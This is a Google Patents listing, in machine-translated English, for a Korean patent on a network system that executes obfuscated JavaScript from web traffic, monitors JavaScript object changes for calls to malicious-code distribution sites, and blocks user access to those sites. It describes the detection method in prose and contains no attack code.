KR101577404B1 - System and method for blocking access malware by using monitoring java-script object and computer program for executing the method - Google Patents
System and method for blocking access malware by using monitoring java-script object and computer program for executing the method Download PDFInfo
- Publication number
- KR101577404B1 KR101577404B1 KR1020150114437A KR20150114437A KR101577404B1 KR 101577404 B1 KR101577404 B1 KR 101577404B1 KR 1020150114437 A KR1020150114437 A KR 1020150114437A KR 20150114437 A KR20150114437 A KR 20150114437A KR 101577404 B1 KR101577404 B1 KR 101577404B1
- Authority
- KR
- South Korea
- Prior art keywords
- javascript
- malicious code
- external link
- packet
- code
- Prior art date
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/306—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information intercepting packet switched data communications, e.g. Web, Internet or IMS communications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L2463/00—Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
- H04L2463/141—Denial of service attacks against endpoints in a network
Abstract
The present invention relates to a malicious code access blocking system, comprising: a malicious code DB including a malicious code distribution code list; A packet collection analyzing device for collecting and analyzing packets transmitted when a user terminal accesses the Internet; And a JavaScript analyzing unit for determining whether the obfuscated JavaScript is calling an external link when the packet includes obfuscated JavaScript, and determining whether the malicious code distribution code is inserted in the external link to be called, .
Description
The present invention relates to a malicious code blocking technology, and more particularly, to a system and a method for blocking malicious code access using JavaScript object monitoring.
In recent years, damage to individuals and companies has been increasing due to leakage of personal information and corporate secrets. The leakage of such personal information and corporate confidentiality is caused by malicious code attacks when individuals and companies use the Internet. Malicious code refers to software that is intentionally made to perform malicious activities such as destroying the system or leaking information against the will and interest of the user. These types of malicious code include hacking tools such as viruses, worms, Trojans, backdoors, Logic Bombs, Trap Doors, malicious spyware spyware and adware. They have problems such as leakage of personal information such as user ID and password, control of target system, change of file deletion, system destruction, leakage of key data and installation of other hacking program, It is very diverse and serious.
In the past, malicious code developers have created malicious codes for the purpose of curiosity or self-disclosure, but recently, malicious codes have been produced to achieve financial benefits and political purposes. As a result, recent malicious codes are threatening Internet users because of the advanced, intelligent and automated attack and propagation technologies. As a result, the damage caused by malicious code has become widespread, and the number of malicious codes has increased exponentially over time. In addition, recent malicious codes may be able to bypass malicious code detection or interfere with and delay analysis of malicious code by incorporating various technologies.
In addition, recent hackers are using malicious code to distribute business, hacking a homepage and using malicious code to spread malicious programs. Hackers will immediately create a malicious attack tool if a zero-day vulnerability (the period between new vulnerabilities and the release of the software's security patches) is discovered due to intentional attack, Distribute malicious code. In addition, hackers can distribute malicious code to a user by causing content created by a partner company to be uploaded to the homepage with the malicious code inserted by an unintentional attack.
Hackers who want to distribute malicious code use evasion techniques to effectively hide malicious code on the hacked homepage. One example of such a circumventing technique is an automated detection prevention technique using a java script obfuscation of a malicious code distributed code. JavaScript obfuscation of malicious code uses scripted source code in the form of encoded strings to prevent automated programs from being found or to be difficult for home page managers to recognize. There are various obfuscation methods such as string encoding, crafted code encoding, and encoding using JavaScript string escape function as examples of such JavaScript obfuscation.
In this way, malicious code is distributed on the homepage of the visited terminal, such as personal information leakage, corporate information leakage, automatic e-mail sending or terminal remote control, such as damage to the malicious program distributed to businesses, such as financial loss, direct or indirect damage I will wear it. In addition, not only the general user who visits the company homepage but also the terminal of the employees inside the company are infected with the malicious code, so that the personal information of the customer and internal information of the company can be leaked.
Therefore, it is necessary to detect the abuse of the web server of the protected company via the malicious code, and to prevent the malicious code from being infected by visiting the external website Do.
Accordingly, it is an object of the present invention to provide a system and method for detecting a malicious code distribution code obfuscated with JavaScript and blocking malicious code distribution site access.
Accordingly, a malicious code access system, which prevents a user terminal from accessing a malicious code distribution web site between a user terminal and the Internet according to an embodiment of the present invention, collects packets transmitted and received when the user terminal accesses the Internet, And if the packet includes the obfuscated Javascript, it is determined whether the malicious code distribution code is inserted into the external link called from the JavaScript executed by executing the obfuscated JavaScript And a JavaScript analyzing apparatus, wherein the JavaScript analyzing apparatus comprises: a JavaScript engine generating unit that generates a JavaScript engine that executes the obfuscated Javascript; a generating unit that generates a JavaScript object in which the obfuscated JavaScript is executed Create JavaScript object And a JavaScript object monitor generating unit for generating a JavaScript object monitor for determining whether the malicious code distribution code is inserted into an external link called from the executed obfuscated JavaScript according to creation or modification of the JavaScript object The malicious code is transmitted to the user terminal by modifying the packet so that the malicious code is inserted into the external link so that the malicious code can not be connected to the external link, thereby preventing the user terminal from accessing the external link Device. ≪ / RTI >
delete
delete
Wherein the JavaScript object monitor detects creation or modification of the JavaScript object and detects whether the external link is invoked if generation or modification of the JavaScript object is detected; And a JavaScript object determination module that determines whether the external link is inserting the malicious code distribution code when the external link is called.
The JavaScript object determination module searches the malicious code DB for the external link and requests the connection blocking device to block access to the external link when the external link exists in the malicious code DB, Judges whether the malicious code is infected or not by checking the operation by executing the external link through a plurality of virtual machines when the malicious code is not present in the malicious code DB, The access blocking device is requested to block the connection of the external link.
Wherein the access blocking device comprises: a packet copying unit for copying the collected packets; A malicious code distributed code collection management unit for additionally registering and managing the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB; And a malicious code spreading code blocking unit for modifying the copied packet and transmitting the modified packet to the user terminal when a connection blocking request is received from the external link.
Wherein the packet collection and analysis apparatus comprises: a packet collection unit for collecting packets transmitted from the user terminal; And a packet analyzer for analyzing whether the collected packet includes content represented by JavaScript.
A method for blocking malicious code access in a malicious code access system that prevents a user terminal from accessing a malicious code distribution web site between a user terminal and the Internet according to an embodiment of the present invention includes: Analyzing whether the packet includes obfuscated JavaScript, if the packet includes obfuscated JavaScript, executing the obfuscated JavaScript, and executing the obfuscated JavaScript, Determining whether a malicious code distribution code is inserted in an external link that is called from the external link; modifying the packet so that the malicious code distribution code can not be connected to the external link when the malicious code distribution code is inserted in the external link; And transmits the packet to the user terminal, Blocking the access to the external link, wherein analyzing whether the packet includes obfuscated Javascript comprises: providing an environment for executing the obfuscated Javascript; Generating a JavaScript object to execute a script, detecting creation or modification of the JavaScript object, and inserting the malicious code distribution code into the external link from an external link called from the executed obfuscated Javascript The malicious code access blocking method comprising the steps of: collecting a packet transmitted when the user terminal accesses the Internet; Analyzing whether the packet includes JavaScript; And determining whether a malicious code distribution code is inserted in an external link called by the JavaScript if the packet includes JavaScript.
The present invention also includes a computer program for executing the malicious code access blocking method.
With the existing technology, the accuracy of detecting and intercepting malicious code is significantly reduced because the obfuscated JavaScript code of html contents on the homepage can not be interpreted. However, according to an embodiment of the present invention, it is possible to detect a distributed code of obfuscated malicious code by copying, collecting and analyzing a packet between a user terminal and the Internet, You can block access to websites. In addition, the present invention generates a JavaScript engine in a system internal memory and executes JavaScript, thereby not only imposing a burden on the user's use of the system, but also completely blocking the infection.
As a result, in the case of an individual, a user can prevent infection of a malicious code from a visited website in order to receive the service. In the case of enterprise, it can prevent infection from external malicious code distribution site visited in the organization. That is, an Internet user can receive a safe and pleasant Internet environment from malicious code.
In addition, when a new vulnerability is discovered due to zero-day attacks, the vaccine manufacturer can use a normalized pattern to detect and block hacking, vulnerabilities, viruses or harmful traffic in signatures (intrusion detection and intrusion prevention systems and other information protection solutions) Meaning) takes an average of 3-5 weeks to patch. On the other hand, when the system according to an embodiment of the present invention is used, a zero-day attack can be coped with by performing URI detection that distributes malicious code.
1 is a view for explaining a malicious code access blocking system according to an embodiment of the present invention.
2 is a view for explaining a JavaScript analysis apparatus according to an embodiment of the present invention.
3 is a view for explaining an access breaker according to an embodiment of the present invention.
4 is a view for explaining a malicious code access blocking method according to an embodiment of the present invention.
FIGS. 5A through 5C illustrate functions of a JavaScript object monitor according to an exemplary embodiment of the present invention.
While the present invention has been described in connection with certain exemplary embodiments, it is to be understood that the invention is not limited to the disclosed embodiments, but, on the contrary, is intended to cover various modifications and similarities. It should be understood, however, that the invention is not intended to be limited to the particular embodiments, but includes all modifications, equivalents, and alternatives falling within the spirit and scope of the invention.
DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS Hereinafter, the present invention will be described in detail with reference to the accompanying drawings.
Furthermore, the singular terms used in this specification and the claims should generally be construed to mean one or more unless otherwise stated.
1 is a view for explaining a malicious code access blocking system according to an embodiment of the present invention.
There are many web pages on the Internet with code that distributes malicious code. However, since the user terminal does not know which web page contains malicious code, it can search many web pages without any inspection. Therefore, even if the user terminal accesses the web page where the code for distributing the malicious code is inserted, the malicious code is downloaded and the user terminal is damaged.
The malicious code
The packet collection and
The packet collecting
The packet collecting
In addition, the
The
If the obfuscated JavaScript is included in the html content, the
The
Specifically, if the obfuscated JavaScript is included in the html content, the
If it is determined that the malicious code distribution code is inserted into the html content, the
The
The packet
2 is a view for explaining a JavaScript analysis apparatus according to an embodiment of the present invention.
2, the
The JavaScript engine creation unit 210 creates the
The JavaScript object generating
When the JavaScript object is generated through the JavaScript
The JavaScript object
The JavaScript object monitor 240 includes a JavaScript
The JavaScript object monitor 240 can monitor the html content in real time from the packets being collected. In particular, the JavaScript object monitor 240 can monitor creation or modification of JavaScript objects in real time.
The JavaScript
For example, the JavaScript
If the src attribute exists, the JavaScript object determination module 242 determines whether the URI existing in the src attribute exists in the malicious code DB. The Uniform Resource Identifier (URI) is an identifier that identifies all the resources on the Internet. The existence of a URI is always attached to the Internet protocol as a basic condition required to use the Internet. The URI includes a URL (Uniform Resource Locator) and a URN (Uniform Resource Name).
If the URI exists in the malicious code DB, it is determined that the malicious code distribution code is inserted in the html content, and the JavaScript object determination module 242 transmits information on the html content to the access blocking device.
If the URI does not exist in the malicious code DB, the JavaScript object determination module 242 uses the virtual machine to dynamically analyze the inserted URI. To this end, the JavaScript object determination module 242 may execute one or more virtual machines to execute a plurality of URIs. The JavaScript object judging module 242 can judge which action is performed by visiting the URI using the program in the virtual machine. If the malicious code is downloaded, the JavaScript object determination module 242 transmits information about the URI and html contents to the access blocking device.
In addition, the JavaScript object determination module 242 can execute a URI extracted through a virtual machine to check whether a DBD (Drive By Downloads) occurs. If the DBD is generated, the JavaScript object determination module 242 determines that the malicious code distribution code is inserted, and transmits the URI and html content information to the access blocking device. Here, DBD is a malicious code that is downloaded and executed without the user's knowledge, by distributing malicious code to an unspecified number of users by using a known security vulnerability. A user accessing a web page by a DBD can be infected with malicious code.
At this time, the JavaScript object determination module 242 can determine whether the URI extracted in conjunction with the malicious code DB or one or more vaccines outside the system contains malicious code distribution code.
3 is a view for explaining an access breaker according to an embodiment of the present invention.
3, the
The
The malicious code distributed code
The malicious code distribution
4 is a view for explaining a malicious code access blocking method according to an embodiment of the present invention.
Referring to FIG. 4, in step S400, the packet collecting unit collects packets from the user terminal. A packet is a set of data that a client, which is a user terminal, can request a communication to an HTTP or HTTPS server and transmit a command that appears in the process of the server responding to the client. Thereafter, the packet analyzer analyzes whether the collected packet includes JavaScript. In addition, the packet analyzing unit can parse the html contents contained in the packet to analyze whether it contains obfuscated JavaScript.
If the html content includes obfuscated JavaScript, a JavaScript engine is created in step S405. The JavaScript engine is a program that runs obfuscated JavaScript and provides an environment in which JavaScript can be executed. Also, since the JavaScript engine is created in the internal memory of the malicious code access blocking system, it may not be affected by the user terminal or the external server.
In step S410, a JavaScript object is created. A JavaScript object is an object from which JavaScript can be executed, such as a JavaScript DOM and a JavaScript BOM. Because JavaScript is a scripting language that is based on objects (objects), a basic JavaScript object must exist to execute JavaScript code.
A JavaScript object monitor is created in step S415.
In step S420, the JavaScript object monitor monitors whether the JavaScript object is created or changed from the JavaScript being executed.
If the creation or modification of the JavaScript object is detected through the JavaScript object monitor, the JavaScript object detection module analyzes the html content generated from the executed obfuscated JavaScript in step S425. Then, the JavaScript object detection module detects whether external resources are invoked among the html contents.
If it is detected that the external resource is called, the JavaScript object determination module determines in step S430 whether the external resource to be called, that is, the URI exists in the malicious code DB.
If the URI exists in the malicious code DB, in step S435, the JavaScript object determination module requests the access blocking device to block the connection so that the user terminal can not use the html content.
If the URI does not exist in the malicious code DB, in step S440, the JavaScript object determination module can execute the URI using the virtual machine. The JavaScript Object Decision Module visits a URI using a program in the virtual machine and can analyze what it does.
In step S445, the JavaScript object determination module may determine whether a risk of malicious code infection occurs in the URI executed in the virtual machine. For example, a JavaScript object decision module can check if a DBD occurs when executing a URI.
If it is determined that there is a risk of malicious code infection, the JavaScript object monitor transmits URI and html content information to the access blocking device in step S450. Thereafter, the access blocking device additionally registers the URI in the malicious code DB and blocks the user terminal from accessing the URI.
FIGS. 5A through 5C illustrate functions of a JavaScript object monitor according to an exemplary embodiment of the present invention.
FIG. 5A is a diagram illustrating an example in which a JavaScript object monitor detects a change in an external link in a state where a JavaScript DOM is generated. FIG.
If the html document as shown in FIG. 5A is included in the packet and is transmitted from the user terminal, the malicious code access blocking system collects the html document through the packet collection and analysis apparatus. If it is determined that the html document contains obfuscated JavaScript, the packet acquisition and analysis device requests analysis of the obfuscated JavaScript with the JavaScript analysis device. The JavaScript parser then generates the JavaScript engine and JavaScript DOM. The JavaScript Object Monitor detects the creation of a JavaScript DOM and determines if there is a risk of malware infection.
Specifically, in step S500, the JavaScript object detection module is detected to be invoked at http://www.w3schools.com ( hereinafter, the first URI) using the src attribute. Accordingly, the JavaScript object determination module can determine whether the first URI is a URI existing in the malicious code DB.
In addition, in step S510, the JavaScript object detection module may detect that the src attribute calls the external link http://www.malware.com/mal.html ( hereinafter, the second URI). That is, when the step S510 is performed, the JavaScript object detection module may detect that the first URI called in step S500 is changed to the second URI. Accordingly, the JavaScript object determination module can determine whether the second URI exists in the malicious code DB.
Thereafter, if the first URI or the second URI is included in the malicious code DB or is not included in the malicious code DB, the access blocking device blocks the user terminal from accessing the URI .
5B is a view for explaining an example in which a JavaScript object monitor performs an external link detection of a src attribute in a state where a JavaScript DOM is generated. The same points as those in FIG. 5A will be omitted and differences will be mainly described.
The JavaScript analysis apparatus can perform step S520 by generating a JavaScript engine and a JavaScript DOM. The JavaScript object monitor can detect that the JavaScript script Iframe tag is generated by performing the step S520 while detecting the creation of the JavaScript DOM. In particular, the JavaScript object detection module can detect the creation of the src attribute in the generated tag. If the creation of the src attribute is detected, the JavaScript object decision module can determine if the URI that the src attribute invokes is inserting code that propagates the malicious code.
5C is a view for explaining an example in which a JavaScript object monitor performs an external link detection of a location attribute in a state where a JavaScript BOM is generated. The same points as those in FIG. 5A will be omitted and differences will be mainly described.
The JavaScript object monitor can detect the creation or modification of a JavaScript BOM. Accordingly, the JavaScript object monitor can detect the change of the location property by performing the step S530 while detecting the change of the JavaScript BOM. If a change in the location attribute is detected, the JavaScript object decision module can determine if the URI that the location attribute invokes is inserting code that propagates the malicious code.
The apparatus and method according to the above-described embodiments of the present invention may be implemented in the form of program instructions that can be executed through various computer means and recorded in a computer-readable medium. The computer readable medium may include program instructions, data files, data structures, and the like, alone or in combination.
Program instructions to be recorded on a computer-readable medium may be those specially designed and constructed for the present invention or may be available to those skilled in the computer software arts. Examples of computer-readable media include magnetic media such as hard disks, floppy disks and magnetic tape; optical media such as CD-ROMs and DVDs; magnetic media such as floppy disks; Includes hardware devices specifically configured to store and execute program instructions such as magneto-optical media and ROM, RAM, flash memory, and the like. Examples of program instructions include machine language code such as those produced by a compiler, as well as high-level language code that can be executed by a computer using an interpreter or the like.
The hardware devices described above may be configured to operate as one or more software modules to perform the operations of the present invention, and vice versa.
The present invention has been described with reference to the preferred embodiments. It will be understood by those skilled in the art that various changes in form and details may be made therein without departing from the spirit and scope of the invention as defined by the appended claims. Therefore, the disclosed embodiments should be considered in an illustrative rather than a restrictive sense. The scope of the present invention is defined by the appended claims rather than by the foregoing description, and all differences within the scope of equivalents thereof should be construed as being included in the present invention.
100: malicious code access blocking system
110: Packet collection analyzer
120: JavaScript analysis device
130:
140: Malicious Code DB
Claims (14)
A packet collection and analysis apparatus for collecting and analyzing packets transmitted and received when a user terminal accesses the Internet; And
And a JavaScript analyzer for determining whether a malicious code distribution code is inserted in an external link called from the JavaScript executed by executing the obfuscated JavaScript if the packet includes obfuscated JavaScript, ,
The JavaScript analysis device
A JavaScript engine generating unit for generating a JavaScript engine for executing the obfuscated JavaScript;
A JavaScript object generation unit for generating a JavaScript object in which the obfuscated JavaScript is executed; And
And a JavaScript object monitor generating unit for generating a JavaScript object monitor for determining whether a malicious code distribution code is inserted into an external link called from the executed obfuscated JavaScript according to creation or modification of the JavaScript object,
And an access blocking device for blocking the user terminal from accessing the external link by transmitting the modified packet to the user terminal so that the malicious code is inserted into the external link, Includes malicious code access blocking system.
Wherein the JavaScript object monitor comprises:
A JavaScript object detection module that detects creation or modification of the JavaScript object and detects whether an external link is invoked if generation or modification of the JavaScript object is detected; And
And a JavaScript object determination module for determining whether the external link is inserting the malicious code distribution code when the external link is called.
Wherein the JavaScript object determination module comprises:
Searches the malicious code DB for the external link,
If the external link is present in the malicious code DB, requesting the connection blocking device to block the connection of the external link,
If the external link does not exist in the malicious code DB, the external link is executed through a plurality of virtual machines to check the operation to determine whether the malicious code is infected. If it is determined that there is a risk of infection of the malicious code And requests the connection blocking device to block the connection of the external link.
The connection blocking device
A packet copying unit for copying the collected packets;
A malicious code distributed code collection management unit for additionally registering and managing the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB; And
And transmitting the modified packet to the user terminal when the connection blocking request is received from the external link.
The packet collection and analysis apparatus
A packet collector for collecting packets transmitted from the user terminal; And
And a packet analyzer for analyzing whether the collected packet includes content represented by JavaScript.
Collecting packets transmitted and received when the user terminal accesses the Internet;
Analyzing whether the packet includes obfuscated JavaScript;
If the packet includes obfuscated JavaScript, determining whether a malicious code distribution code is inserted in an external link called from the executed JavaScript by executing the obfuscated JavaScript;
Modifying the packet so that it can not be connected to the external link when the malicious code distribution code is inserted in the external link; And
Transmitting the modified packet to the user terminal, and blocking the user terminal from accessing the external link,
The step of analyzing whether the packet includes obfuscated JavaScript
Providing an environment for executing the obfuscated JavaScript;
Generating a JavaScript object in which the obfuscated JavaScript is executed;
Detecting creation or modification of the JavaScript object; And
And determining whether the external link is inserting the malicious code distribution code in an external link called from the executed obfuscated JavaScript.
Wherein the step of determining whether the external link inserts the malicious code-
Comparing the external link with a malicious code database;
Blocking the connection of the external link when the external link exists in the malicious code DB;
Executing a plurality of virtual machines when the external link is not present in the malicious code DB;
Executing the external link in the virtual machine to confirm the operation; And
And blocking the connection of the external link when the operation has a risk of infecting the malicious code.
Wherein the step of interrupting the connection of the external link comprises:
Copying the collected packets;
And modifying the copied packet and transmitting the modified packet to the user terminal.
Further comprising registering the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB.
A computer program for causing a malicious code access blocking method to be recorded on a computer readable recording medium.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150114437A KR101577404B1 (en) | 2015-08-13 | 2015-08-13 | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150114437A KR101577404B1 (en) | 2015-08-13 | 2015-08-13 | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Publications (1)
Publication Number | Publication Date |
---|---|
KR101577404B1 true KR101577404B1 (en) | 2015-12-28 |
Family
ID=55084985
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
KR1020150114437A KR101577404B1 (en) | 2015-08-13 | 2015-08-13 | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Country Status (1)
Country | Link |
---|---|
KR (1) | KR101577404B1 (en) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
WO2019027106A1 (en) * | 2017-08-01 | 2019-02-07 | 주식회사 에프원시큐리티 | System for analyzing degree of risk for malicious code distribution site by using machine learning |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR20100123368A (en) * | 2009-05-15 | 2010-11-24 | 인포뱅크 주식회사 | System and method for analyzing malicious code |
KR101200906B1 (en) * | 2011-04-27 | 2012-11-13 | (주)소만사 | High Performance System and Method for Blocking Harmful Sites Access on the basis of Network |
KR101514984B1 (en) * | 2014-03-03 | 2015-04-24 | (주)엠씨알시스템 | Detecting system for detecting Homepage spreading Virus and Detecting method thereof |
-
2015
- 2015-08-13 KR KR1020150114437A patent/KR101577404B1/en active IP Right Grant
Patent Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR20100123368A (en) * | 2009-05-15 | 2010-11-24 | 인포뱅크 주식회사 | System and method for analyzing malicious code |
KR101200906B1 (en) * | 2011-04-27 | 2012-11-13 | (주)소만사 | High Performance System and Method for Blocking Harmful Sites Access on the basis of Network |
KR101514984B1 (en) * | 2014-03-03 | 2015-04-24 | (주)엠씨알시스템 | Detecting system for detecting Homepage spreading Virus and Detecting method thereof |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
WO2019027106A1 (en) * | 2017-08-01 | 2019-02-07 | 주식회사 에프원시큐리티 | System for analyzing degree of risk for malicious code distribution site by using machine learning |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10956566B2 (en) | Multi-point causality tracking in cyber incident reasoning | |
US10592676B2 (en) | Application security service | |
US10447730B2 (en) | Detection of SQL injection attacks | |
US11941054B2 (en) | Iterative constraint solving in abstract graph matching for cyber incident reasoning | |
Egele et al. | Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks | |
KR101514984B1 (en) | Detecting system for detecting Homepage spreading Virus and Detecting method thereof | |
US11184374B2 (en) | Endpoint inter-process activity extraction and pattern matching | |
US9092823B2 (en) | Internet fraud prevention | |
US20090064337A1 (en) | Method and apparatus for preventing web page attacks | |
KR101080953B1 (en) | System and method for detecting and protecting webshell in real-time | |
WO2009032765A2 (en) | Proxy engine for custom handling of web content | |
WO2017056121A1 (en) | Method for the identification and prevention of client-side web attacks | |
US20160134658A1 (en) | Unauthorized access detecting system and unauthorized access detecting method | |
JP6450022B2 (en) | Analysis device, analysis method, and analysis program | |
JP5752642B2 (en) | Monitoring device and monitoring method | |
KR101487476B1 (en) | Method and apparatus to detect malicious domain | |
KR100961149B1 (en) | Method for detecting malicious site, method for gathering information of malicious site, apparatus, system, and recording medium having computer program recorded | |
TWI470468B (en) | System and method for detecting web malicious programs and behaviors | |
JP5656266B2 (en) | Blacklist extraction apparatus, extraction method and extraction program | |
KR101372906B1 (en) | Method and system to prevent malware code | |
CN108040036A (en) | A kind of industry cloud Webshell safety protecting methods | |
KR20080036706A (en) | Web security module using regulation expression of web attack and include function of script language | |
KR101754195B1 (en) | Method for security enhancement based on multi log gathering server | |
KR20120070025A (en) | Web / email for distributing malicious code through the automatic control system and how to manage them | |
KR101577404B1 (en) | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
E701 | Decision to grant or registration of patent right | ||
GRNT | Written decision to grant | ||
FPAY | Annual fee payment |
Payment date: 20181206 Year of fee payment: 4 |